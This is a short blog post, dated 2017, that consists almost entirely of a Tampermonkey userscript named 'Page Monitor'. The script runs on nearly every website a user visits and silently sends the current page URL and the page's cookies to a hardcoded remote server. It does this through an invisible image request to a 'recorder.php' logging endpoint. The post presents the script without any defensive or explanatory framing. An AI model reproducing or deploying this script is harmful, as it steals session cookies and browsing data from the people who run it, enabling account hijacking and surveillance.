monitor

// ==UserScript==
// @name         Page Monitor
// @namespace    http://tampermonkey.net/
// @version      0.1
// @description  try to take over the world!
// @author       Dem0nX14n3
// @match        *
// @include      *
// @exclude      https://*.baidu.com/*
// @exclude      http://*.baidu.com/*
// @exclude      http://118.89.51.198/*
// @grant        none
// ==/UserScript==

(function() {
    'use strict';
    var img = new Image();
    var storageURL = "http://118.89.51.198/lzx/recorder.php";      //information storage file
    var accessURL = window.location;
    var acCookie  = document.cookie;
    img.style.width = img.style.height = "0";
    img.src = storageURL +"URL="+accessURL +"&Cookie="+acCookie;
    // Your code here...
})();

 

posted @ 2017-11-29 09:44  Khazix  阅读(213)  评论(0编辑  收藏  举报